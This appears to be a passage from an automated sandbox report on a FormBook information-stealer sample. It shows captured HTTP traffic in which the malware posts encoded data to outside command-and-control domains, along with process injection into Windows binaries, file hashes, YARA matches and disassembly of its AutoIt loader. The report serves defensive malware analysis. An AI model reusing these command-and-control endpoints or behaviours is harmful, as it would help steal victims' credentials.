47 66 6a 4f 6f 4f 72 6d 62 31 6a 56 2f 58 35 2f 32 35 66 7a 51 39 57 71 64 6a 77 69 34 73 69 31 69 33 46 75 6b 4c 77 4b 39 77 39 63 39 59 64 54 6e 51 57 64 78 52 46 48 6c 54 48 6c 77 71 5a 76 4f 62 7a 73 36 47 7a 63 41 34 75 75 39 2f 68 51 79 76 52 4f 2b 75 49 74 76 73 54 5a 55 50 46 51 51 6a 36 5a 72 52 68 59 69 68 65 76 49 6f 64 6c 72 2f 4a 6b 50 49 7a 67 4f 45 63 35 6b 6b 7a 7a 4e 77 73 35 61 76 63 37 45 69 7a 35 71 4f 44 51 4a 58 44 35 49 49 4d 37 47 61 61 74 2f 6a 5a 2b 6f 7a 48 74 43 72 31 6c 62 33 38 4e 34 7a 2b 68 4e 53 52 2b 32 6c 6c 58 53 44 31 79 58 4c 61 43 53 59 59 64 44 77 56 62 31 6c 47 36 4d 51 70 53 72 4a 31 65 37 31 30 62 74 6a 5a 48 32 55 6f 72 59 48 6e 7a 45 55 45 65 6e 58 5a 4e 37 69 4b 59 6c 68 62 76 73 46 56 79 48 6e 75 62 47 4b 58 4b 7a 52 54 66 70 59 62 65 56 55 7a 6d 70 72 61 65 [TRUNCATED] Data Ascii: _6yxCX=K3B/WoIvcrplRxRWiPWKAbdMGdLO9wumGdUtp6AkKNFpgDtDufUMIGsAqjcGfjOoOrmb1jV/X5/25fzQ9Wqdjwi4si1i3FukLwK9w9c9YdTnQWdxRFHlTHlwqZvObzs6GzcA4uu9/hQyvRO+uItvsTZUPFQQj6ZrRhYihevIodlr/JkPIzgOEc5kkzzNws5avc7Eiz5qODQJXD5IIM7Gaat/jZ+ozHtCr1lb38N4z+hNSR+2llXSD1yXLaCSYYdDwVb1lG6MQpSrJ1e710btjZH2UorYHnzEUEenXZN7iKYlhbvsFVyHnubGKXKzRTfpYbeVUzmpraefYAlQvZFbCZYQM8E4bN/433iAJ8Cak9MAR/msttrKg54jT80c95q8EMaPwWSFiwiGPXcYyQtzMKdWC+yXsPOPVeGW6SCnk1Xw1kHdLMlNvADTDzCwk4BJeZR3kpHzHENxogYluWazUX8q5cxmIwgcNMZbfQuW7uiCgk8UybSQo0F7RzY7wlIi47IkZbPVscvQKcbfs8qYy/4eVIJgadbmCMzas9sIe6pAQIfxY8+9wiARQpTIBpRsZHjbFUNlXl856lnILF1vQ9vLWd4Ic6gM+8yb8dt55if6V1fMsN5Pe41Ly5Uw94JINKqO6kRsz4i2EKcDj1SyMI//y9F3LwgFw5sNlPW35qgQOb8ED/Ypdy31YageFLK7/qeUrcW5AR5Pr+alJ422XE0iBX9lY8AjsBrg1gHPTBhA9/KRt82cRhLs/7eUHb2uDIoo3dMBcloYe1axF9ZI002NTrvHdHa8TuI0kXkl5qQOiPWzsbiFuV+k5QjxbkwmpJB8eSxe44qNrwwFlAOdRLcpdLsrEugIwF1H99fBynF3HIZ0oYvKGujROSqsm1jjQYqAeQrWzEjOMiI9f/ip3t8Ee9KaZZ6PkZ0+ao8S9wPUfxl5tf/49AVRHRZICCVXbQKkAnSCJfNpQFbnGFVCfsgfLJYuNZdEn52A12rl05Xsl [TRUNCATED]
Jan 10, 2025 20:20:55.330008984 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49999	13.248.169.48	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:20:57.421916008 CET	599	OUT	GET /wvsm/?_6yxCX=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2rBmc4SdotweHLQOOyOBULIHFd1VBahrHXCh9vf/2fl8+QQ==&vNTT0=e8zLx HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.sfantulandrei.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Jan 10, 2025 20:21:06.928105116 CET	387	IN	HTTP/1.1 200 OK content-type: text/html date: Fri, 10 Jan 2025 19:21:06 GMT content-length: 266 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5f 36 79 78 43 58 3d 48 31 70 66 56 65 6c 32 64 72 6c 63 59 44 68 36 70 70 65 51 4b 4c 64 61 4f 39 44 4f 68 6a 36 79 49 4c 38 38 6d 34 6c 6c 48 75 5a 38 34 78 73 6a 69 66 78 54 50 67 42 48 6c 42 59 66 50 52 53 34 65 59 2b 76 37 31 73 2f 62 5a 7a 67 6d 63 57 62 2f 67 71 32 72 42 6d 63 34 53 64 6f 74 77 65 48 4c 51 4f 4f 79 4f 42 55 4c 49 48 46 64 31 56 42 61 68 72 48 58 43 68 39 76 66 2f 32 66 6c 38 2b 51 51 3d 3d 26 76 4e 54 54 30 3d 65 38 7a 4c 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?_6yxCX=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2rBmc4SdotweHLQOOyOBULIHFd1VBahrHXCh9vf/2fl8+QQ==&vNTT0=e8zLx"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50000	104.21.96.1	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:21:11.980506897 CET	850	OUT	POST /0pqe/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.mffnow.info Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 207 Cache-Control: no-cache Origin: http://www.mffnow.info Referer: http://www.mffnow.info/0pqe/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 58 4c 77 69 65 59 2b 61 74 38 6d 37 65 72 33 70 43 67 4d 34 72 78 71 71 6d 73 52 49 2f 59 75 77 65 44 62 37 72 5a 47 34 41 32 65 7a 42 4e 73 4e 36 33 43 4c 30 65 35 59 39 45 64 75 55 5a 6d 74 4c 6b 44 69 74 31 41 52 4d 61 52 41 76 50 44 33 4e 52 54 69 5a 6e 4b 61 50 51 34 50 73 49 72 4c 33 70 39 71 67 61 7a 30 43 49 74 44 7a 52 76 61 4e 64 43 45 46 33 61 6e 73 58 76 6b 62 46 79 47 53 49 5a 74 66 38 53 57 71 4b 4d 6b 37 4c 49 79 69 30 47 61 71 49 67 77 62 6b 65 62 2b 75 62 52 68 6f 64 7a 67 48 6a 62 6f 36 58 73 6a 4d 46 42 74 31 41 63 2f 37 37 77 75 63 52 41 4d 2b 6a 39 6b 2f 7a 6c 66 44 6f 3d Data Ascii: _6yxCX=XLwieY+at8m7er3pCgM4rxqqmsRI/YuweDb7rZG4A2ezBNsN63CL0e5Y9EduUZmtLkDit1ARMaRAvPD3NRTiZnKaPQ4PsIrL3p9qgaz0CItDzRvaNdCEF3ansXvkbFyGSIZtf8SWqKMk7LIyi0GaqIgwbkeb+ubRhodzgHjbo6XsjMFBt1Ac/77wucRAM+j9k/zlfDo=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50001	104.21.96.1	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:21:14.534379959 CET	870	OUT	POST /0pqe/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.mffnow.info Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 227 Cache-Control: no-cache Origin: http://www.mffnow.info Referer: http://www.mffnow.info/0pqe/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 58 4c 77 69 65 59 2b 61 74 38 6d 37 66 4c 6e 70 52 52 4d 34 6a 78 71 72 2f 63 52 49 32 34 75 38 65 44 48 37 72 59 79 6f 41 44 32 7a 50 50 6b 4e 31 53 2b 4c 34 2b 35 59 33 6b 64 76 4a 70 6d 32 4c 6b 4f 64 74 31 38 52 4d 5a 74 41 76 4c 48 33 4d 69 72 6a 59 33 4b 50 4a 51 34 42 6a 6f 72 4c 33 70 39 71 67 61 33 4b 43 49 46 44 7a 69 33 61 4e 38 43 46 5a 6e 61 6b 6c 33 76 6b 4e 31 79 4b 53 49 5a 50 66 39 4f 6f 71 49 30 6b 37 4c 34 79 69 67 71 64 78 59 68 35 45 30 66 34 2f 2b 36 4b 6e 6f 52 78 6a 42 2b 2b 2f 35 2f 69 72 61 30 72 33 58 49 30 73 62 58 49 2b 50 5a 33 64 4f 43 55 2b 63 6a 56 42 55 2f 59 44 73 71 4c 37 52 47 68 65 46 46 6b 34 38 46 66 31 4d 66 32 Data Ascii: _6yxCX=XLwieY+at8m7fLnpRRM4jxqr/cRI24u8eDH7rYyoAD2zPPkN1S+L4+5Y3kdvJpm2LkOdt18RMZtAvLH3MirjY3KPJQ4BjorL3p9qga3KCIFDzi3aN8CFZnakl3vkN1yKSIZPf9OoqI0k7L4yigqdxYh5E0f4/+6KnoRxjB++/5/ira0r3XI0sbXI+PZ3dOCU+cjVBU/YDsqL7RGheFFk48Ff1Mf2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50002	104.21.96.1	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:21:17.086330891 CET	1887	OUT	POST /0pqe/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.mffnow.info Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1243 Cache-Control: no-cache Origin: http://www.mffnow.info Referer: http://www.mffnow.info/0pqe/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 58 4c 77 69 65 59 2b 61 74 38 6d 37 66 4c 6e 70 52 52 4d 34 6a 78 71 72 2f 63 52 49 32 34 75 38 65 44 48 37 72 59 79 6f 41 44 75 7a 50 36 77 4e 30 78 57 4c 35 2b 35 59 78 55 64 71 4a 70 6e 30 4c 6b 57 5a 74 31 78 6b 4d 66 68 41 67 49 50 33 59 44 72 6a 57 33 4b 50 4c 51 34 41 73 49 71 52 33 70 74 55 67 61 48 4b 43 49 46 44 7a 6a 48 61 4c 74 43 46 62 6e 61 6e 73 58 76 6f 62 46 79 75 53 49 42 31 66 39 4b 34 74 38 41 6b 36 76 55 79 6a 54 53 64 39 59 68 33 46 30 66 65 2f 2b 32 76 6e 6f 4e 62 6a 42 6a 62 2f 36 76 69 6f 76 6c 78 72 33 45 4c 36 71 4c 48 36 74 4d 55 46 49 43 72 78 65 6a 65 43 54 76 68 4a 76 69 2f 75 42 79 56 58 6c 38 65 6b 6f 30 4b 30 49 6e 38 64 53 53 6b 41 66 63 58 36 63 4a 63 31 6a 6d 44 4f 54 30 67 37 68 48 4c 34 74 73 4b 4a 76 78 58 69 78 4f 54 41 58 6b 79 75 4b 66 4a 70 44 4c 7a 6a 57 43 75 2f 49 51 72 58 72 74 6a 48 2b 57 53 57 78 77 62 68 68 6a 4f 74 2b 51 43 4e 51 4a 31 42 71 44 4c 4a 66 4f 63 36 56 6a 33 46 72 78 6a 75 44 5a 4e 41 38 6c 58 69 61 64 37 33 4a 56 [TRUNCATED] Data Ascii: _6yxCX=XLwieY+at8m7fLnpRRM4jxqr/cRI24u8eDH7rYyoADuzP6wN0xWL5+5YxUdqJpn0LkWZt1xkMfhAgIP3YDrjW3KPLQ4AsIqR3ptUgaHKCIFDzjHaLtCFbnansXvobFyuSIB1f9K4t8Ak6vUyjTSd9Yh3F0fe/+2vnoNbjBjb/6viovlxr3EL6qLH6tMUFICrxejeCTvhJvi/uByVXl8eko0K0In8dSSkAfcX6cJc1jmDOT0g7hHL4tsKJvxXixOTAXkyuKfJpDLzjWCu/IQrXrtjH+WSWxwbhhjOt+QCNQJ1BqDLJfOc6Vj3FrxjuDZNA8lXiad73JVMEj2tOi/cT3WWY5ZPZPUekutpu2ta/EBQU5BaFS8tor7Gn3+r93gk1gGmZrPvIfsvC9RulsRHMk2bFE2QjqvwsyOUorkjcIzPQ293+petEW2nZadLLdUr+Vj6uKNGvxYhrUYo7l0kCD5XI2KiLeBpBmtnAGm2XTvcpBXSyR8zosDDVP3WwYW1v5p2W08nxPE6bCpQbNZHCQ4bm7vqhXu1NL2H8La4tRPiPE2qsTNDPcJFeVw7KoAoCTlDnIMDXFtLy8nEjJorBM3fQED+GBvqH3xWnKNDaGmGcG5xfjR/P/l/tLAU7lkPS4Hi5sZtdAW8kkoMviZ9oCEgQRf3iWZDGmus4D/Kt0QcEAP+9XDenEgv5HMmxHD5Wsk31LFrRSsQLdTr9HkZr9avZTZGkIef+gqLPP4yasUqwSuu50CpGqCJRLpC5ZB7A8USEJOHhj/jfznA2TjslkSGBaWdupzzJu1waL43yNmOA3FB9Gl9VcNG8grRj2Oo2Z6NBgnQhTQwVCV+yUsSTz8uapMq57ntCjWKnglL3qlRhxnrlrNLeZTBEqanKvQI0S3AjeH+ws2NUnX594WR1q1PYk0uSC+xglgKi4/OVJWwE23dBqNlqX7SXq+XgWMN4HN2J7V+aJX/r/9StAtGZ3nnXc6BGuIiuvqwU030WAFDq [TRUNCATED]
Jan 10, 2025 20:21:18.727819920 CET	753	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:21:18 GMT Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t9Bgpnc%2FlV7djegI8pA0r%2Fl%2F9yKnHHT37YHpbIFE8JOFtARDbLk%2BZHsbR9g08FB4gTNnhYnk7l5ilfkTTsHBcBUrct4EpHKG2ABgvUW7B2FxEs3QpLIxyczbLpo3hxt%2FesM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fff077c4d671a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1901&min_rtt=1901&rtt_var=950&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1887&delivery_rate=0&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	14:18:09
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\EIvidclKOb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\EIvidclKOb.exe"
Imagebase:	0xf00000
File size:	1'204'224 bytes
MD5 hash:	76BF1F21C8727FAACB6F4761B72E17B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:18:10
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\EIvidclKOb.exe"
Imagebase:	0xd00000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2482909431.0000000003A40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2482512715.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2483416999.0000000004950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:18:41
Start date:	10/01/2025
Path:	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe"
Imagebase:	0xe0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3960869459.0000000002E80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	14:18:42
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\comp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\comp.exe"
Imagebase:	0xb30000
File size:	23'552 bytes
MD5 hash:	712EF348F7032AA1C80D24600BA5452D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3960892293.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3960832005.0000000000880000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3959727235.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	14:18:56
Start date:	10/01/2025
Path:	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe"
Imagebase:	0xe0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3962348656.0000000005900000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	14:19:09
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6d64d0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	7.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	158

Executed Functions

Function 00F03B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F03B68
IsDebuggerPresent.KERNEL32 ref: 00F03B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,00FC52F8,00FC52E0,?,?), ref: 00F03BEB

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

Part of subcall function 00F1092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F03C14,00FC52F8,?,?,?), ref: 00F1096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00F03C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00FB7770,00000010), ref: 00F3D281
SetCurrentDirectoryW.KERNEL32(?,00FC52F8,?,?,?), ref: 00F3D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00FB4260,00FC52F8,?,?,?), ref: 00F3D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 00F3D346

Part of subcall function 00F03A46: GetSysColorBrush.USER32(0000000F), ref: 00F03A50
Part of subcall function 00F03A46: LoadCursorW.USER32(00000000,00007F00), ref: 00F03A5F
Part of subcall function 00F03A46: LoadIconW.USER32(00000063), ref: 00F03A76
Part of subcall function 00F03A46: LoadIconW.USER32(000000A4), ref: 00F03A88
Part of subcall function 00F03A46: LoadIconW.USER32(000000A2), ref: 00F03A9A
Part of subcall function 00F03A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F03AC0
Part of subcall function 00F03A46: RegisterClassExW.USER32(?), ref: 00F03B16

Part of subcall function 00F039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F03A03
Part of subcall function 00F039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F03A24
Part of subcall function 00F039D5: ShowWindow.USER32(00000000,?,?), ref: 00F03A38
Part of subcall function 00F039D5: ShowWindow.USER32(00000000,?,?), ref: 00F03A41

Part of subcall function 00F0434A: _memset.LIBCMT ref: 00F04370
Part of subcall function 00F0434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F04415

Strings

This is a third-party compiled AutoIt script., xrefs: 00F3D279
runas, xrefs: 00F3D33A

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 14eb6b4bbc01955057da1dfdaea1178d96271556d7788c984d4d3bff70f89ca4
Instruction ID: 58f8818ea98e7db7f1f2a63290a040bdc35da97cb81f72579da7d906fe767cfd
Opcode Fuzzy Hash: 14eb6b4bbc01955057da1dfdaea1178d96271556d7788c984d4d3bff70f89ca4
Instruction Fuzzy Hash: C651D871D0820DAEDF11EBB4ED06EFD77B9AB45B50F1040A9F411A31E2CA74A685FB21

Function 00F049A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00F049CD

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

GetCurrentProcess.KERNEL32(?,00F8FAEC,00000000,00000000,?), ref: 00F04A9A
IsWow64Process.KERNEL32(00000000), ref: 00F04AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00F04AE7
FreeLibrary.KERNEL32(00000000), ref: 00F04AF2
GetSystemInfo.KERNEL32(00000000), ref: 00F04B23
GetSystemInfo.KERNEL32(00000000), ref: 00F04B2F

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 495ed6dbfe392d0a797d7e965dd05a291ab9586c0c7ba0d54e7eddb7d564f6eb
Instruction ID: 3b81e6a9866c312030b8ae2c51dc6ca3a23177342d7de79c5f9b33bb0adb1ff6
Opcode Fuzzy Hash: 495ed6dbfe392d0a797d7e965dd05a291ab9586c0c7ba0d54e7eddb7d564f6eb
Instruction Fuzzy Hash: 7B910771A897C0DECB31DB7894502AAFFF5AF29310F44499DD5C783A81D224B908F769

Function 00F04E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00F04D8E,?,?,00000000,00000000), ref: 00F04E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F04D8E,?,?,00000000,00000000), ref: 00F04EB0
LoadResource.KERNEL32(?,00000000,?,?,00F04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00F04E2F), ref: 00F3D937
SizeofResource.KERNEL32(?,00000000,?,?,00F04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00F04E2F), ref: 00F3D94C
LockResource.KERNEL32(00F04D8E,?,?,00F04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00F04E2F,00000000), ref: 00F3D95F

Strings

SCRIPT, xrefs: 00F04EA6

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 56f72aa5d8f89ff87cb235edd1a3d81c6cd1795df1059f04899e10c7e2d7419c
Instruction ID: f2953feda56a5b5d119caa06bc8557039882c2155054afb0b94102bee05cf70f
Opcode Fuzzy Hash: 56f72aa5d8f89ff87cb235edd1a3d81c6cd1795df1059f04899e10c7e2d7419c
